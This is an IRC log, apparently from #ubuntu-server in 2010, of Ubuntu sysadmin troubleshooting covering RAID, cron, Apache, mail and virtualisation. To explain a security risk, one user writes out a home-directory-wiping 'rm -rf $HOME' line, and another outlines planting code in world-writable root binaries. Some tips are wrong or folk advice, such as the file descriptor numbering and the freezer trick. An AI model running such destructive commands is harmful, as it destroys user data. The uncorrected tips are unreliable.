<mattgyver> simplexio, its not quite random so i dont think its hw related, i wouldnt be suprised if the code does not have shutdown and reboot commands within though
<mattgyver> simplexio, Im running Jinzora, not sure if your familiar with that its a music content manager and sharing utility
<simplexio> mattgyver: ssh server and tail -f /var/log/kern.log etc.. log files to see latest error
<mattgyver> okay, i will include that with my next test that I am about to do
<mattgyver> simplexio, if i recall tail must be run before hand as it will output live data to the terminal correct?
<simplexio> mattgyver: just open several conenction and 'tail -f' for kern.loh, syslog etc etc-.. log in /var/log/
<mattgyver> ok
<simplexio> mattgyver: tail -f outputs if there is some new line in file, thats why you need few windows
<mattgyver> ok
<mattgyver> I will make that its own test then
<simplexio> mattgyver: or conenction to keep on eye for several logs
<southpadre> whenever i do dig @ns1.everydns.net mydomain.com the record is a couple behind its and its not updating
<southpadre> any ideas
<benc1> I want to monitor the memory usage of one application
<benc1> when using top I get VIRT, RES, SHR and the memory in precentage
<benc1> what are VIRT, RES and SHR and is it possible to change the precentage to MB?
<uvirtbot`> New bug: #425407 in dovecot (main) "Panic: pop3-login: file client-common.c: line 25 (client_unlink): assertion failed: (clients_count > 0)" [Undecided,New] https://launchpad.net/bugs/425407
#ubuntu-server 2010-09-06
<vibedigital> hi. How to send a specific log event by email on ubuntu server 10.04  ?
<hmca> anyone here with ubuntu 10.4 and raid6 ? trying to do this - echo "clean" > /sys/block/md1/md/array_state , get a echo write error: Invalid argument
<hmca> trying to recover a 10tb raid6
<hmca> anyone here ?  trying to do this - echo "clean" > /sys/block/md1/md/array_state , get a echo write error: Invalid argument
<jjk9___> hmca:  here but don't know
<hmca> desperatly trying to get a 10tb raid6 up again
<jjk9___> hmca:  i can try something similar here and see what it does if you can wait a few mins
<hmca> jjk9___: thanks, i have seen this as a way out to my problem but ubuntu people get this error Invalid argument
<jjk9___> hmca:  so I don't know what this all is.. I have a 2tb raid1 on md1 and  ls -l /sys/block/md1/md/array_state gives -rw-r--r-- 1 root root 4096 2010-08-13 10:10 /sys/block/md1/md/array_state  is there a man page for this stuff?
<hmca> jjk9___: following this hoping it can help, http://ubuntuforums.org/showthread.php?t=1538137 , take a look
<jjk9___> hmca: k
<hmca> mine is raid6 10 1.5TB disks
<jjk9___> jjk9___:  reading ...
<jjk9___> hmca:  that looks to deep for my tiny mind :( sorry dont think i can be of any help
<hmca> jjk9___: thanks
<jjk9___> hmca: what does cat /sys/block/md1/md/array_state return?
<jjk9___> hmca: for me it returns clean
<hmca> jjk9___: inactive
<hmca> i have a failed device , faulty removed
<jjk9___> hmca:  is there anything that might be done using mdadm?
<hmca> i have active devices 9 , working devices 9 and failed devices 1
<hmca> i'am assumning , faulty removed using mdadm -E /dev/sdi , means the mdadm is managing the raid, but why is it not runung , active, raid6 is dual redundancy, so i assumed i could just lost a disk
<jjk9___> hmca:  I'm not to up on raid 6 can it run with one bad drive? or do you need to put a new one in and use like mdadm to add it to the raid?
<hmca> i was assuming it would still run with 1 broken disk
<hmca> Disk util on gnome says State: not running, partially asssemble
<jjk9___> hmca:  like I say I not so up on raid6 would need to go read about it and that could take forever
<hmca> people start working here in arround 8 hours
<jjk9___> hmca:  maybe you need to tell the raid to go on without the bad drive?
<jjk9___> hmca:  u can do a lot in 8 hrs
<jjk9___> hmca: ok I just read wiki on raid6 and they say you can lose 2 drives and still run
<hmca> right
<hmca> i only have one faulty, so do i need to manualy tell mdadm to remove it from md0?
<hmca> lets see how to do
<jjk9___> hmca:  i'm searching for docs on that
<hmca> http://www.linuxquestions.org/questions/linux-server-73/mdadm-raid-5-single-drive-failure-644325/ , maybe what i am failing 2 understand is that failling a disk as to be replaced, i thouth it could be ok to workl
<jjk9___> hmca:  im reading this basic one http://www.review-ninja.com/2009/05/software-raid-raid-arrays-mdadm-on.html
<jjk9___> hmca:  I agree it seems like it should keep working however I don't know the behavior when you reboot with a failed rive in the array...
<jjk9___> hmca:  what does cat /proc/mdstat tell
<hmca> inactive
<jjk9___> hmca: so did u reboot into this or did the drive fail while the raid was working. I guess I'm asking if this is from reboot or while working. It looks from the link you gave as if you need to use mdadm to logically remove the failed drive from the array.  I need to try out fail modes on my raid1 for when it happens for real so I know how to handle it
<hmca> the system totaly crash while rebilding , i have a 45 drive bays system , only with 10 now , i had to power down the machive , mdadm says the drive as been removed from array , mybe i need to actualy remove it from the system ? is that it ?
<jjk9___> hmca: maybe you need to tell mdadm what the new array is . like when you make the array from scratch...
<jjk9___> hmca:  I don't think that physical removal makes a diff if ma=dadm already thinks the failed on is gone
<hmca> --create / assemble , they have all refused to activate the array , yes but i still removed it , waiting for the machine to come up
<hmca> my backplanes are all hotswapable , but i told the os to reboot
<jjk9___> hmca: good luck!
<jjk9___> hmca:  there might be someone over on #ubuntu who knows about raid6 etc
<hmca> jjk9___: i still not beliving but it worked, let me check
<jjk9___> hmca:  woohoo!
<hmca> it is sayin on proc , reshape + 80,2 %
<jjk9___> hmca:  when I replace with raid1 it takes for ever to resync
<hmca> now i just need to see if iscsitarget piks the md0 , a see if my hfsplus+ part from mac os x is there
<jjk9___> hmca:  so what did the trick?
<hmca> i know how to improve speed , give me a sec
<hmca> fisicaly removing the disk
<jjk9___> hmca:  that really surpriss me but maybe due to startup scripts
<jjk9___> hmca:  md startup might have been looking for all and bawking on the bad or something
<hmca> i will discuss more on this i u give me a sec/few minuts, need to goo to the mac station to see if the big disk shows up in iscsi
<jjk9___> k
<hmca> jjk9___: back back, feel happy..., md0 running iscsitarget runing, mac station mounting iscsitarge , violume seems ok/not corrupted
<hmca> now for speeding up the rebuilds
<hmca> i have the info somewhere, w8
<jjk9___> hmca:  glad 2 hear u r out of trouble
<hmca> it took a week for a guy in the office to upload almost 8TB into this , very slow process, i didnt wanna him or me to do it again , time is money
<echosystm> hi guys
<hmca> cheers
<echosystm> ive just installed apache - what is the best way to make the www directory writeable by my user?
<jjk9___> echosystm:  hi
<echosystm> should i symlink it to a folder in home?
<echosystm> should i modify the permissions on /var/www?
<echosystm> or should i just change the config to point to a folder in home?
<jjk9___> echosystm:  on my web server (disclaimer: im no expert) I have the folder owned by the user and apache is a member of the group that can write to that
<jjk9___> echosystm:  that way user and apache can write to user folder but user can't write to other folders
<fluvvell> echosystem, rather than change apache
<fluvvell> ive made the user a member of the www-data group
<echosystm> is that all you needed to do fluvvell ?
<echosystm> dir /var/www/ is owned by root:root
<fluvvell> echosystm, as long as the folders where the www files are going to be have group read/write permissions
<fluvvell> yes, but html under that ?
<echosystm> root:root
<echosystm> lol
<jjk9___> fluvvell:  doesn't that mean that the users can access each others  folders if they all belong to www-data?
<echosystm> i might just change the apache config to point to somewhere in home, all good
<fluvvell> jjk9___, yes but he implied one user
<jjk9___> fluvvell:  then np
<fluvvell> echosystm, where we had implemented the changes to apache, it came to greif much later when we did upgrades and updates to apache
<fluvvell> much better off to keep it closer to the installed standard.
<fluvvell> clearly there are configs you *will* change
<fluvvell> echosystm, how did you install apache ?
<echosystm> apt-get install apache2
<fluvvell> and whats your output of    ps aux |grep apache
<fluvvell> are the apache processes running as root as well ?
<echosystm> one is
<echosystm> 4 arent
<echosystm> *3 arent
<fluvvell> so what user are the other ones running as ?
<echosystm> 3 are www-data
<fluvvell> yep, I have 1 as root, 5 as www-data
<fluvvell> once you set up your virtual hosts, I think the files you create will need to be www-data owned.  I'd not consider myself an expert, but thats been my experience over about 5 or six apache servers we run.
<echosystm> the actual www-data folder will be owned by root though
<echosystm> so even if i am in www-data myself, i cannot write to that folder
<echosystm> im just going to change the document root, its easiest
<echosystm> easy to change back if i need to
<fluvvell> no but add yourself to the www-data group.
<fluvvell> of course the good thing about ubuntu/linux is experimenting :-)
<fluvvell> the conventions that are adopted are just there to make things easier and more consistent.
<fluvvell> and I guess secure.
<echosystm> alrighty, thanks for your help
<echosystm> ciao
<yaboo> any raid guru's about
<MTecknology> !anyone
<ubottu> A large amount of the first questions asked in this channel start with "Does anyone/anybody..."  Why not ask your next question (the real one) and find out?
<jjk9> MTecknology:  ask again  i just swung by
<MTecknology> jjk9: that was for yaboo asking if anyone is around
<jjk9> k
<yaboo> ok got a raid 5 unit with three disks, rebooted the array, and getting mount: you must specify the filesystem type when I try to mount it
<yaboo> ok, seems no-one knows anything about mdadm and howto recover the disks
<jjk9> yaboo:  wot does cat /proc/mdstat  say
<yaboo> jjk9, nothing, looks normal till I try to mount the device, and errors with no filesystem
<jjk9> yaboo:  if cat /proc/mdstat  returns nothing that's not normal
<jjk9> yaboo:  how r u mounting the device?
<yaboo> jjk9 cat proc shows there's md0, three disks there etc, nothing out of the ordinary
<yaboo> jjk9, mount /dev/md0 /home/storage
<yaboo> ok get a lot of superblock errors
<jjk9> yaboo:  when do u get the superblk errors?
<yaboo> trying fsck -b 8193 /dev/md0
<jjk9> yaboo:  what fs do u expect on there?
<yaboo> formated it ext3
<jjk9> yaboo:  have u tried  -t ext3 when mounting?
<yaboo> jjk9, just tried and states wrong fs type, bad option, bad superblock on /dev/md0
<jjk9> yaboo:  try fsck.ext3 /dev/md0
<jjk9> yaboo:  http://www.linuxquestions.org/questions/linux-software-2/debian-raid-5-rebuild-457098/
<yaboo> fsck.ext3: Superblock invalid, trying backup blocks...
<yaboo> fsck.ext3: Bad magic number in super-block while trying to open /dev/md0
<yaboo>  jjk9
<jjk9> yaboo:  u have plumbed the depth of my meager knowledge. I'm all out 4 now. :(
<yaboo> jjk9, THANKS
<jjk9> yaboo: yw I didn't help much.   btw lots of hits on search  "Bad magic number in super-block while trying to open"
<yaboo> jjk9, something to do with superblock invalid
<jjk9> yaboo: best of luck
<yaboo> jjk9, thanks
<twb> I have a lucid router.  I'm trying to add a USB wifi dongle to it, to turn it into a wifi AP./
<twb> On Debian, it says I need firmware-ralink (http://wiki.debian.org/WiFi/rt73), but this isn't in Ubuntu (per rmadison).
<ajmitch> twb: ralink drivers are generally awful, but you may find that linux-firmware has what you need
<twb> Which package is the binary blob in?
<twb> OK, looking
<twb> I already have linux-firmware installed (presumably its in main, not restricted), so I'll install hostapd and wpa_supplicant and see if it Just Works
<ajmitch> which usb dongle do you have?
<twb> ajmitch: 148f:2573
<ajmitch> quite different from the linksys one that I have then
<ajmitch> which is 1737:0078, hopefully you have better luck with it than I've seen
<twb> I actually asked the boss to just go buy half a dozen different manufacturers' devices, hoping to get at least one with a "good" chipset
<twb> But what happened was he took his old one from home :-/
<yaboo> if I format over partition can I recover the data beforehand
<twb> yaboo: well, yeah, just back it up before you format it
<yaboo> twb seems I have superblock errors and no matter how much I fsck etc, it seems not able to fix the disk
<twb> Try sticking in the freezer for an hour (wrapped in cloth)
<twb> Of course, it WILL be a complete farce unless Kanno does the soundtrack
<twb> Oops, wrong channel.
<uvirtbot> New bug: #239906 in groovy (main) "Dependency on libbsf-java is invalid" [Undecided,Fix released] https://launchpad.net/bugs/239906
<uvirtbot> New bug: #631200 in bacula (main) "package bacula-director-mysql (not installed) failed to install/upgrade: subprocess installed post-installation script returned error exit status 1 (dup-of: 563039)" [Undecided,New] https://launchpad.net/bugs/631200
<aegis> Has anyone else had trouble installing Drupal 6 from the package?  It does not create any of the directories/files in /var/www/  ...
<twb> It's a packaging violation to place files in /var/www.
<twb> Sorry, make that "discouraged" rather than "disallowed" (Â§11.5.4)
<PresuntoRJ> aegis: have you read the "official" community documentation? https://help.ubuntu.com/community/Drupal
<PresuntoRJ> aegis: it worked fine the last time I have tried it :D
<PresuntoRJ> aegis: of course, if it does not work anymore, you could try to comment in a bug report
<uvirtbot> New bug: #631307 in openldap (main) "package slapd 2.4.21-0ubuntu5.3 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/631307
<PresuntoRJ> aegis: there is also one at the drupal site: http://drupal.org/node/626404
<PresuntoRJ> aegis: the files might not live where you would expect them to be, but it should work
<PresuntoRJ> aegis: and it should get symliked to the /var/www anyway
<PresuntoRJ> aegis: does it help?
<uvirtbot> New bug: #631324 in ntp (main) "package ntp 1:4.2.4p8+dfsg-1ubuntu2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/631324
<yaboo> formated a disk, if I have not written new data on the disk, can I recover the old data on the disk?
<huats> morning
<twb> Where is lucid's equivalent of /lib/udev/net.agent?
<twb> You know, the thing that makes allow-hotplug entries in /etc/network/interfaces *actually work*
<twb> Unfortunately there's not debian-to-ubuntu diff on http://packages.qa.debian.org/u/udev.html, because lucid's udev is built from a git snapshot
<\sh> twb, regarding some release notes and working with ifenslave-2.6. which had debian wise the "allow-hotplug" format, someone said, we don't have allow-hotplug that's why we are using "auto"
<twb> Well, auto is not the same thing
<\sh> i know :)
<twb> See, there is this bug
<twb> When I unplug the SERIAL cable, it removes and readds the USB wifi device
<twb> Which results in me not having an AP anymore
<twb> (The wifi device is configured as an AP with hostapd.)
<\sh> you mean "serial cable" as in "serial cable" and not as in "usb2serial" ... because why should something remove the usb device when unplugging a serial cable
<twb> So you would THINK that simply changing "auto wifi0" to "allow-hotplug wifi0" would DTRT, but no, it causes wifi0 to never ever ever be raised, probably because the udev maintainer assumed everyone was using laptops running NM.  ARGH ARGH ARGH.
<twb> \sh: yes, it has a real serial port.
<twb> Admittedly, I'm then plugging a USB-to-serial bridge into its 9-pin serial port, and the plugging the USB end into my laptop
<twb> I'd be amazed if linux can see that it's a USB-to-serial bridge from the serial side
<twb> (Sorry about losing my temper; I was expect it to Just Work, like Debian.)
<twb> I'll stop working on that now so I don't have to call a glazier
<uvirtbot> New bug: #631451 in eucalyptus (main) "[UIFe] UEC Web Portal has old logo, and css needs tweaking." [Undecided,Confirmed] https://launchpad.net/bugs/631451
<Error404NotFound> I don't know if this is the right place, but againt my script i get "Please enable following functions in your php.ini: filter_var" even though phpinfo() in same directory reveals no disabled functions.
<DigitalDeviant> anyone available to answer a question
<kaushal> hi
<DigitalDeviant> i installed ispconfig3 on my ubuntu server and created the website, uploaded my website but its not working.
<kaushal> hi
<kaushal> i get Cannot join to channel #ubuntu-virt (You must be invited)
<twb> DigitalDeviant: that package is not part of Ubuntu
<twb> DigitalDeviant: you will have to talk to whoever supplied it.
<twb> kaushal: try #virt (or #libvirt?)
<twb> !ops #ubuntu-virt is invite-only
<ubottu> Error: I am only a bot, please don't think I'm intelligent :)
<twb> Hmph.
<kaushal> twb: ok
<kaushal> twb: can someone allow me in there :)
<soren> kaushal: It's been discontinued.
<soren> kaushal: People attempting to connect to it are redirected here.
<soren> kaushal: Since you're already here, you get odd results.
<twb> soren: thanks
<twb> Might be worth poking #freenode about it in case there's a way to avoid the "odd results"
<soren> kim0: Can you take care this? ^^ (I'm assuming you're the one who made the changes based on your comment on the mailing list: https://lists.ubuntu.com/archives/ubuntu-server/2010-August/004512.html )
<kim0> My understanding the problem is, when you join #ubuntu-virt while already joined to #ubunt-server, you simply get "invite only channel"
<kim0> if so, I already talked to the irc council folks
<kim0> and they said, this is a weird Freenode thing that they can't do anything about
<twb> Probably they don't want to patch their funky ircd
<twb> *patch it any more
<kim0> :)
<yoosef> hi. ive been running ubuntu server 10.04 for a bit over month now. i use it as fileserver on my lan, its also running openssh-server. everything seems to work fine... but i think the server load averages are bit too high, for system only running samba & openssh-server. load avarages are anything between 1.00 - 1.20. most of the times its 1.00. got 4gb ram and pentium 2.8ghz installed.. any ideas what might cause that load?
<AndyGraybeal> hey guys, i'd like to install 'lightning' for all my users.. i can install it to my 'user' folder.. and i don't want to do single installs for all my users.. is there an easy way to accomplish this?
<tgywa> Do anyone know if ksplice is stable enough for critical production enviroments?
<soren> AndyGraybeal: What's lightning?
<twb> yoosef: no.  Ask top(1).
<twb> AndyGraybeal: apt-get install sunbird?
<twb> AndyGraybeal: or does it have to be the plugin version?
<twb> It may be called "iceowl" instead of "sunbird"; the latter is trademark-encumbered.
<twb> AndyGraybeal: other than that, you can always just drop it into the appropriate magical folder somewhere in /usr -- the one thunderbird looks in for plugins.  I don't know much about that.
<AndyGraybeal> interesting
<AndyGraybeal> thank you twb
<yoosef> twb: ive used top -command, but nothing seems to use any significant amount of cpu or mem..
<AndyGraybeal> soren, lightning is the new sunbird
<twb> soren: it's basically sunbird (read: mozilla calendar) as a thunderbird package.
<soren> AndyGraybeal: then this is the wrong channel :)
<twb> AndyGraybeal: really?  I thought sunbird was newer
<AndyGraybeal> twb, i don't know but mozilla recommends moving to lightning from sunbird.  i'm not sure why.
<twb> Because they're goats and rabid space-donkeys
<AndyGraybeal> exactly
<twb> I mean, they're up there with schily and tuomov
<ricdanger> hi
<kaushal> hi
<kaushal> any help document to setup KVM on Ubuntu Server 10.04 ?
<kaushal> also when i install Ubuntu 10.04 Server what does one means by Ubuntu Enterprise Cloud ?
<kaushal> while installation
<sherr> kaushal: there are docs on the Ubuntu site e.g.
<sherr> https://help.ubuntu.com/10.04/index.html
<sherr> + https://help.ubuntu.com/community/UEC
<Datz> Hi, I'm trying to enable cron logging. I'm folling a tutorial: Edit /etc/syslog.conf and uncomment the line starting with cron.*   However, there is no /etc/syslog.conf
<Datz> also reading that restarting sysklogd would create such a file. But I don't see "/etc/init.d/sysklogd" although I know that there used to be such a file in my previous desktop install
<Datz> Ok, looks like it logs within syslog?
<Datz> Does it do the same verbose of logging?
<dennis> hey experts... so we upgraded a server from 8.04 -> 10.04 and now the lvm volumes cant be found e.g the system wont reboot
<dennis> I've tried booting from live-cd and chrooting into the root running dpkg-reconfigure linux-image-kernel
<dennis> without any luck
<kaushal> is VM means Virtual Machine ?
<kaushal> https://help.ubuntu.com/community/KVM/FAQ
<stlsaint> dennis: does your fstab show correct uuid for drives?
<dennis> stlsaint, yes but we just changed it to use logical named instead of UID
<stlsaint> dennis: well you may want to review your fstab, more than likely that is where your problem is
<dennis> ok thanks.. I'll have one more close look
<dennis> I fail to understand how an upgrade could change the uuid if my disks tho
<kaushal> can i seek help regarding kvm setup on Ubuntu 10.04 Server ?
<kaushal> I am actually reading it
<kaushal> also what is the difference between UEC and KVM ?
<uvirtbot> New bug: #631737 in samba (main) "gvfsd-smb uses all cpu when trying to connect to samba share" [Undecided,New] https://launchpad.net/bugs/631737
<olopez> hello anyone have experience with ubuntu and solaris ldoms ?
<Datz> hello, well I think I have some information on why my cronjob isn't working. in syslog I get:  postfix/sendmail[19238]: fatal: open /etc/postfix/main.cf: No such file or directory
<Datz> can someone help me with this error?
<jjk9> Datz:  I came in late... wots yr cronjob trying to do?
<Datz> */5 * * * cat /var/log/fail2ban.log > /var/www/site/fail2ban.log
<Datz> the command works fine, but in cron, nothing happens. I noticed that message in syslog every five min
<jjk9> Datz:  that is cron trying to send you an email
<Datz> no, just create a new file
<jjk9> Datz:  sounds like you don't have postfix configured correctly
<Datz> I see
<jjk9> Datz:  when you run a cron with any output it tries to send email to te cron user
<Datz> output as in cat in this case?
<jjk9> Datz:  any output from the cronjob
<Datz> Ok, just trying to understand.. I have other cron jobs.. and this message only appears in the system log at the interval my failed cron job is running
<jjk9> Datz:  if cronjob has no output then no mail from it. If this one fails cron trying to tell cron user that is case
<Datz> I see
<Datz> thanks
<Datz> so if I were to set up postfix/sendmail. I would get a message indicating what went wrong?
<Datz> should I run /etc/postfix/post-install?
<jjk9> Datz:  if something went wrong wit the cronjob yes. If you just want to see the error you might try piping errors to a file  by putting something like 2>myerrorlogfile
<Datz> at end of failing cronjob?
<jjk9> Datz:  at the end of the line on cron that you think is failing
<Datz> */5 * * * cat /var/log/fail2ban.log > /var/www/site/fail2ban.log 2| ~/error.log  ?
<jjk9> Datz: 2 > ...
<Datz> sorry, thanks. I'll try it
 * Datz waits for it to appear
<jjk9> Datz:  do **** on cron line for testing...
<Datz> I actually did, with spaces
<Datz> * * * * *  cat /var/log/fail2ban.log > /var/www/site/fail2ban.log 2> ~/error.log
<Datz> er.. space before 2?
<jjk9> Datz:  I just skipped spaces :( sorry , yes 2 is stdout and 3 is stderr so
<Datz> ok, spaced :)
 * Datz is waiting.. :p
<Datz> not seeing anything. THis is exact entry * * * * *  cat /var/log/fail2ban.log > /var/www/site/fail2ban.log 2 > ~/error.log
<jjk9> Datz:  ok let me try here wait one
<Datz> thanks
<RoyK> Datz: no space after 2
<Datz> ok
<Datz> :)
<RoyK> Datz: also, make sure /var/log/fail2ban.log is readable for the user running the cron job
<Datz> the command works outside of cron
<RoyK> for that user?
<Datz> yes
<Datz> nothing in ~ yet
<RoyK> ok, I think I've seen something like that earlier - try to create a script doing cat ... > log etc and run that script
<RoyK> from cron
<Datz> humm, ok good idea
<uvirtbot> New bug: #631383 in samba (main) "Samba: Slow file open & Incomplete multibyte sequence error" [Undecided,New] https://launchpad.net/bugs/631383
<uvirtbot> New bug: #631489 in samba (main) "Browsing through Folders via samba is very slow" [Undecided,New] https://launchpad.net/bugs/631489
<RoyK> Datz: or even better - setup fail2ban to log to a named pipe (or fifo) and read from that, copying the info to separate files
<Datz> ok, well I created the script, and ran it. It works
<Datz> made a cronjob for it "* * * * *  ~/test" <- is that correct
<Datz> RoyK: that last option sounds too complex for me currently
<jjk9> Datz:  maybe pipe stdout (&2) and stderr(&3) to the log 3>&2 2>~/error.log
<Datz> ok
<RoyK> jjk9: stdout is file 1 and stderr is file 2
<RoyK> stdin is 0
<jjk9> RoyK:  err 1 is stdin
<Datz> * * * * *  cat /var/log/fail2ban.log > /var/www/site/fail2ban.log 3>&2 2>~/error.log  <- ?
<RoyK> Datz: change the crontab to use the log, and beleive me, 0 is stdin, 1 is stdout, 2 is stderr
<jjk9> Datz:  so when I try * * * * * echoo "boo" > /root/tt 3>&2 2>tterr3  i   I get errors echoo not found in tterr3
<RoyK> echooo asdf > output 2> errors
<Datz> ok
<RoyK> Datz: but run the script, not the script's contents from cron
<jjk9> RoyK: my bad u are right
<RoyK> something > output == something 1> output
 * Datz is slightly confused
 * Datz re-reads
<qman__> Datz, I see one problem, your original cron is missing a parameter, "*/5 * * *" is only four
 * Datz checks on this
<RoyK> Datz: http://pastebin.com/TMwW380D
<RoyK> get it?
<qman__> also, you don't specify a user
<qman__> one job in my /etc/cron.d/, for example
<RoyK> qman__: no need to do that with a normal cron job - only the ones in /etc/cron* needs that
<Datz> RoyK: got it
<RoyK> if adding it with crontab -e, it's run under the current user
<qman__> 13 * * * * root [script]
<RoyK> if in /etc/cron.d, you need a user
<qman__> yeah
<Datz> ! it's working
<RoyK> :)
<Datz> ha.. I triggered ubottu
<Datz> it's almost like it started magically working..
<Datz> I checked on what qman__ said about 4 time entries, there were 5 at that moment in time, I uncommitted entry and it works..
<Datz> heh
<Datz> well, thanks guys :)
<jjk9> Datz:  also if it fails now and u don't have mail setup then you won't know til next tome u login
<alekto> how could a shell initialization file in a home directory that is group writable be a security risk?
<RoyK> alekto: some member of the group can add the line 'rm -rf $HOME' at the end - that won't be much fun
<alekto> ah, I see.. letting other users be able to delete home dir is not a good idea ;)
<alekto> so what about executable files in /usr/sbin that is world writable? could this really harm the system?
<RoyK> don't do that
<RoyK> executables in system path should _NEVER_ be world-writable
<alekto> oh, okay.. what could this result in? everybody shutting down the system?
<qman__> that's just asking for an infection
<qman__> drop some malicious code into something root uses, wait until root uses it, game over
<uvirtbot> New bug: #631837 in puppet (main) "Sync puppet 2.6.1~rc3-1 (main) from Debian experimental (main)" [Wishlist,Confirmed] https://launchpad.net/bugs/631837
<alekto> hehe, oh shit!
<silentwater77> i installed apparmor with apt-get on a fresh lucid minimal. apparmor_status said command not found. /etc/init.d/apparmor start gives me just a new prompt. what do i have to do to make it even start ?
<RoyK> silentwater77: apparmor is installed by default iirc
<silentwater77> i have a fresh 10.04 minimal...apt-get install apparmor just installed it.
<RoyK> that should be enough
<silentwater77> apparmor_status says command not found
<silentwater77> lsmod  is empty
<RoyK> http://pastebin.com/8k1natKe
<RoyK> silentwater77: apparmor-utils perhaps
<dominicdinada> how to flush user mail i let my cron logs get to big
<RoyK> they should be flushed automatically, in realtime
<silentwater77> thanks royk...my desktop gives me the same messages
<RoyK> what mta are you using?
<silentwater77> on my vps i get:     root@dice:/var/log# aa-status
<silentwater77> apparmor module is not loaded.
<dominicdinada> ebox and webmin show 20,000 msgs from the cron, ebox jobs
<RoyK> wtf
<silentwater77> should i better go for selinux ?
<RoyK> nope
<RoyK> I really don't know - I haven't used the minimal setup for some time - regular works well
<RoyK> dominicdinada: which mta are you using?
<dominicdinada> mta?
<RoyK> ubottu: explain mta
<RoyK> hm
<dominicdinada> !mta
<ubottu> A Mail Transfer Agent (MTA) is the server software that sends and queues mail. The default MTA (and !MDA) on Ubuntu is !postfix ("exim" is also officially supported). See also !MailServer and !MUA
<dominicdinada> oh just the system mail
<RoyK> postfix? exim? sendmail?
<dominicdinada> sendmail i believe is where the logs are
<qman__> yeah, ubuntu doesn't have a local mta installed by default, you have to pick one
<RoyK> dominicdinada: try postfix
<dominicdinada> ok ?
<RoyK> best mta there is imho
<qman__> I won't disagree
<dominicdinada> it is in the postfix mail
<dominicdinada> how to flush such high msgs crashes browser tab lol
<RoyK> if so, 'postfix flush' will flush the queue
<dominicdinada> ?
<RoyK> # postfix flush
<dominicdinada> ok
<RoyK> but with 20k emails in the queue, something is probably quite bad
<dominicdinada> RoyK: No it is just how ebox set things to notify... running the flush did nothinh
<dominicdinada> nothing* even
<RoyK> can you pastebin parts of mailq output?
<RoyK> # mailq
<dominicdinada> each crontab, logged to a user
<dominicdinada> is empty
<dominicdinada> is not under this username
<RoyK> if mailq is empty, the postfix mail queue is empty
<dominicdinada> well duh
<uvirtbot> New bug: #631740 in samba (main) "Dbus error when clicking network icon in nautilus" [Undecided,New] https://launchpad.net/bugs/631740
<RoyK> if the email is distributed to the local accounts under /var/mail, that's where it is
<dominicdinada> it is under nobody
<silentwater77> fresh ubuntu 10.04 minimal has in daemon log:    init: cron main process (87) killed by TERM signal. is this normal ?
<RoyK> dominicdinada: change the email address or add a ~/.forward file in which you set the email address to where the email is to be forwarded
<RoyK> silentwater77: not really - check dmesg - perhaps something bad, like an OOM happened
<qman__> silentwater77, all that means is init killed cron at some point in time
<dominicdinada> b rb looking into it
<RoyK> qman__: should init kill cron?
<qman__> when shutting down, shouldn't it?
<RoyK> well, yes :)
<silentwater77> dmesg is empty...i rebooted
<RoyK> silentwater77: was this kill in conjunction with a reboot?
<silentwater77> yes, message cam just before reboot
<qman__> now, if init killed cron when you weren't shutting down, then something's messed up
 * RoyK hands qman__ a beer
<silentwater77> if i get u right its normal right before shutting down
<qman__> yes, by TERM, at shutdown, is normal
<silentwater77> thanks, i wondered because i had trouble with packages (mountall, upstart) beeing on hold right after install
<RoyK> silentwater77: before a shutdown, all processes are killed, first an attempt is made with SIGTERM and then they are forcibly killed with SIGKILL
<silentwater77> ah, i understand, thanks
<silentwater77> but i guess its not normal that 2 packages are on hold (mountall, upstart) right after fresh install on a openvz vps
<qman__> probably not
<qman__> but I've never done a minimal install
<silentwater77> im asking because now mysql wont start automatically after reboot
<RoyK> silentwater77: Can you try with the standard server install?
<silentwater77> standart server is available but not offcial supported by my provider
<RoyK> silentwater77: eh - they support the minimal, but not standard??
<RoyK> silentwater77: sounds very strange to me, since the standard install is the most commonly used, and disk space required isn't really a lot
<silentwater77> yes, they make their on localized template based on ubuntu minimal....
<RoyK> their own?
<dominicdinada> ok how to delete mail from a system account?
<RoyK> imho it would be better if they released the translations instead of keeping them local.....
<RoyK> dominicdinada: /var/mail
<silentwater77> yes, they have someone who is the "template master". he is in charge for building the templates
<silentwater77> i could install all openvz wiki templates like : "ubuntu-10.04-lamp_10.04_i386"
<silentwater77> maybe i better go for that
<silentwater77> lamp is what i need
<RoyK> apt-get install \*
<RoyK> :D
<silentwater77> ;-)
<dominicdinada> -rw-rw----  1 nobody   mail 30891684 2010-09-06 14:07 nobody
<dominicdinada> wow
<RoyK> lol
<dominicdinada> cron,ldf,csf all putting events there lol
<dominicdinada> if i just del the file that will mess things up right
<silentwater77> i just installed the official ubuntu minimal and ran into the same mountall, upstart issue
<RoyK> dominicdinada: yes, but check first - there's probably fixes to be made in cron etc to stop those emails
<RoyK> silentwater77: which version?
<dominicdinada> RoyK: those mail are fine but not the ebox i was wrong there is 29,000 cron mails for ebox events :O
<silentwater77> 10.04 minimal i3386
<dominicdinada> cant narrow it and del in smaller sets
<RoyK> dominicdinada: can't you just install standard server?
<dominicdinada> RoyK:  plz stop answerin g questions with more questions i am trying to clean this mail this moment
<RoyK> dominicdinada: that was for silentwater77
<RoyK> silentwater77: can't you just install standard server?
<dominicdinada> i have dovecot but i am trying to cleasn 29k system mails
<silentwater77> no i cant. i have to choose a template for openvz vps
<silentwater77> something to choose of : http://wiki.openvz.org/Download/template/precreated
<RoyK> silentwater77: I guess you'll have to ask your ISP, then
<RoyK> silentwater77: if they support it, they should know
<silentwater77> i give it a try with ubuntu-10.04-lamp_10.04_i386
<silentwater77> if thats struggling with the same issue i will ask for support then. anyway thank you !
<jeiworth> hmm strange, do i have to change anything in a config file to connect to qemu/libvirt on a remoite machine with virt-manager?
<RoyK> jeiworth: iirc qemu only listens to localhost
<RoyK> by default, that is
<jeiworth> hmmm well i found an entry in /etc/libvirt/libvirt.conf: listen_address that was commented out, i set it to the ip of the server but its running some producition systems so i can't restart the service...
<RoyK> can't you just start virt-manager on the host?
<RoyK> ssh X forwarding and so on
<incognito> I am running a server on an hp d530S. It won't boot. I researched the problem and I believe that I need to change a parameter to FRAMEBUFFER=y in my /etc/initramfs-tools/conf.d/splash file, but the file is not in the directory. What should I do?
<incognito> Can I copy the file from a desktop instance?
<RoyK> incognito: https://wiki.ubuntu.com/FrameBuffer
<jeiworth> <RoyK> can't you just start virt-manager on the host? <-- yeah, no problem there
<jeiworth> but i dont think you need x forwarding
<jeiworth> or you mean starting virt-manager through an existing ssh connection?
